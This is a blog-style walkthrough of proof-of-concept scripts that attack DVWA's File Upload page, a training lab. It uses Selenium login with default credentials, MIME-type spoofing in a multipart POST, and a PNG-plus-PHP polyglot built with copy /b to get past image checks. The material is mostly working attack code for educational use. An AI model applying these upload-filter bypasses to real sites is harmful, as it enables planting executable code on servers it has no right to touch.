POC——DVWA's File Upload
2022-07-19 04:59:00 【wavesky111】
Level-Low
Recently I learned some Python Selenium, so I just wrote a Low-level POC with it ~
from selenium.webdriver import Chrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait

driver = Chrome()

# Log in with the default DVWA credentials
driver.get("http://192.168.117.130/DVWA-1.9/login.php")
WebDriverWait(driver, 10).until(lambda d: "Login" in d.title)
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/p/input').click()

# DVWA Security page: set the level to "low" and submit
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
level = Select(driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/select'))
level.select_by_value("low")
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/input[1]').click()

# File Upload page: choose the PHP file and submit the form
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[2]').send_keys('/path/one.php')
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[3]').click()

# On success DVWA echoes the stored path of the file (ending in one.php) inside a <pre>
response = driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/pre')
marker = 'one.php'
if marker in response.text:
    print("It looks likely vulnerable")
else:
    print("It is strong")
driver.quit()
Level-Medium
import browser_cookie3
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

# Reuse the DVWA session cookies (PHPSESSID and security=medium) from the logged-in browser
cookie = browser_cookie3.chrome()
URL = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/upload/'

with open("one.php", "rb") as fl:
    # Medium only checks the declared MIME type and the size, so declare image/png for the PHP file
    m = MultipartEncoder(
        fields={
            'MAX_FILE_SIZE': '100000',
            'uploaded': ('one.php', fl, 'image/png'),
            'Upload': 'Upload',
        })
    headers = {"Content-Type": m.content_type}  # carries the generated boundary
    response = requests.post(URL, data=m, headers=headers, cookies=cookie)

# On success DVWA echoes the stored path of the file (ending in one.php)
marker = 'one.php'
if marker in response.text:
    print("It looks likely vulnerable")
else:
    print("It is strong")
Another thing: I ran into many problems here before, and it took a long time to deal with them alone, so I am noting them down now:
- Here the browser's Content-Type is multipart/form-data. This type is quite interesting and distinctive: the way POST parameters are transmitted does not change, but the "key:value" form is replaced by a randomly generated string used as a delimiter, and the delimiter separates the various parameters and the binary content of the file. So constructing the POST request needs a package that does multipart file upload (MultipartEncoder) (there are other ways; this one is used here for future convenience). The link is here;
- In many of the multipart/form-data file upload examples online, a token value is used, but I did not find one in the request I captured. Looking it up online, it may be that DVWA does not define a token key. But since it is also authentication, the cookie has the same effect. The differences between cookie, session and token are here;
- After requests sends the data, it is URL-encoded automatically.
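To make the first note concrete, here is an added example (not the author's code) that builds a multipart/form-data body by hand instead of with requests_toolbelt, decodes it the way a server would, and runs the result through a Python mirror of the DVWA Medium upload check (declared MIME type must be image/jpeg or image/png and size below 100000). The PHP payload, file name and boundary prefix are constructed for the example. It shows why declaring image/png in the file part works against Medium: the type the server compares is whatever the client wrote into the part header.

```python
import os

# Constructed sample payload (stands in for the one.php used in the post)
PHP_PAYLOAD = b'<?php echo "upload test"; ?>\n'


def encode_multipart(fields, boundary=None):
    """Serialise form fields as multipart/form-data.

    fields maps a field name to either a str value or a
    (filename, bytes, declared_content_type) tuple for a file part.
    Returns (body, value_for_the_Content-Type_request_header).
    """
    if boundary is None:
        # Random delimiter, as a browser or MultipartEncoder would generate
        boundary = "----pyboundary" + os.urandom(16).hex()
    lines = []
    for name, value in fields.items():
        lines.append(f"--{boundary}".encode())
        if isinstance(value, tuple):
            filename, data, ctype = value
            lines.append(
                f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode())
            lines.append(f"Content-Type: {ctype}".encode())  # chosen by the client, never sniffed
            lines.append(b"")
            lines.append(data)
        else:
            lines.append(f'Content-Disposition: form-data; name="{name}"'.encode())
            lines.append(b"")
            lines.append(str(value).encode())
    lines.append(f"--{boundary}--".encode())
    lines.append(b"")
    return b"\r\n".join(lines), f"multipart/form-data; boundary={boundary}"


def decode_multipart(body, boundary):
    """Toy server-side decoder: plain fields come back as str, file parts as dicts
    shaped like PHP's $_FILES entries (name, type, size) plus the raw data."""
    delim = b"\r\n--" + boundary.encode()
    fields = {}
    for segment in (b"\r\n" + body).split(delim)[1:]:
        if segment.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, data = segment[2:].partition(b"\r\n\r\n")  # skip the CRLF after the delimiter
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, val = line.partition(":")
            headers[key.strip().lower()] = val.strip()
        params = {}
        for param in headers["content-disposition"].split(";")[1:]:
            key, _, val = param.strip().partition("=")
            params[key] = val.strip('"')
        if "filename" in params:
            fields[params["name"]] = {
                "name": params["filename"],
                "type": headers.get("content-type", ""),
                "size": len(data),
                "data": data,
            }
        else:
            fields[params["name"]] = data.decode()
    return fields


def dvwa_medium_accepts(upload):
    """Mirror of the DVWA Medium check: declared type on an allow-list and size < 100000.
    Both values are taken straight from the request."""
    return upload["type"] in ("image/jpeg", "image/png") and upload["size"] < 100000


def build_request(declared_type):
    """Same three fields the post sends, with the given declared type on the file part."""
    return encode_multipart({
        "MAX_FILE_SIZE": "100000",
        "uploaded": ("one.php", PHP_PAYLOAD, declared_type),
        "Upload": "Upload",
    })


def server_sees(declared_type):
    """Encode the request and decode it again: what PHP would find in $_POST / $_FILES."""
    body, content_type = build_request(declared_type)
    boundary = content_type.split("boundary=", 1)[1]
    return decode_multipart(body, boundary)


if __name__ == "__main__":
    body, content_type = build_request("image/png")
    print(content_type)
    print(body.decode("latin-1"))
    print("declared image/png accepted:", dvwa_medium_accepts(server_sees("image/png")["uploaded"]))
    print("honest type accepted:", dvwa_medium_accepts(server_sees("application/x-php")["uploaded"]))
```

Running it prints the raw body, so the boundary lines and the per-part Content-Type header are visible, and then shows the same PHP bytes being accepted with image/png and refused with application/x-php; only the header changed.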
Level-High
Here there is one more step: in cmd, `copy /b one.png + one.txt /a two.png` hides the PHP inside an image (High checks the file extension and that the content parses as an image with getimagesize(), as well as the file size), and the new two.png is uploaded instead. Getting it executed then involves file inclusion, which comes later; I won't do that here ~
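As an added example (not the author's code), the copy /b step in Python together with a mirror of what DVWA High checks before storing a file: the extension must be jpg, jpeg or png, the size must be under 100000 bytes, and the content must be recognised as an image. The Python stand-in for getimagesize() only sniffs the PNG and JPEG signatures, which is the part that matters here. The PNG header and the PHP payload are constructed for the example; a real one.png from disk behaves the same. A plain one.php is refused on the extension, while the concatenated two.png passes all three checks and still carries the PHP code byte for byte, which is why the follow-up is a file inclusion bug rather than a direct request to the stored file.

```python
import os
import struct
import zlib

# Constructed PHP payload (stands in for the one.txt used in the post)
PHP_PAYLOAD = b'<?php echo "polyglot test"; ?>\n'

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(chunk_type, data):
    """One PNG chunk: big-endian length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def minimal_png(width=1, height=1):
    """Smallest structure an image-header parser needs: signature, IHDR, IEND.
    Constructed stand-in for one.png (no pixel data, so it is not a viewable image)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit RGB, no interlace
    return PNG_SIGNATURE + png_chunk(b"IHDR", ihdr) + png_chunk(b"IEND", b"")


def make_polyglot(image_bytes, payload):
    """Equivalent of `copy /b one.png + one.txt /a two.png`: the image, then the payload."""
    return image_bytes + payload


def sniff_image(data):
    """Stand-in for getimagesize(): identify the format by magic bytes.
    Returns 'png', 'jpeg' or None; trailing bytes after the image are ignored."""
    if data.startswith(PNG_SIGNATURE):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    return None


def dvwa_high_accepts(filename, data):
    """Mirror of the DVWA High check: extension allow-list, size limit, content parses as an image."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return (ext in ("jpg", "jpeg", "png")
            and len(data) < 100000
            and sniff_image(data) is not None)


if __name__ == "__main__":
    two_png = make_polyglot(minimal_png(), PHP_PAYLOAD)
    print("one.php accepted:", dvwa_high_accepts("one.php", PHP_PAYLOAD))  # refused on extension
    print("one.png accepted:", dvwa_high_accepts("one.png", PHP_PAYLOAD))  # refused: not an image
    print("two.png accepted:", dvwa_high_accepts("two.png", two_png))      # passes all checks
    print("payload intact:", PHP_PAYLOAD in two_png)                        # PHP still in the file
```

Renaming alone is not enough here: one.png with PHP content fails the image check, and it is the leading image header that satisfies it while the PHP rides along at the end.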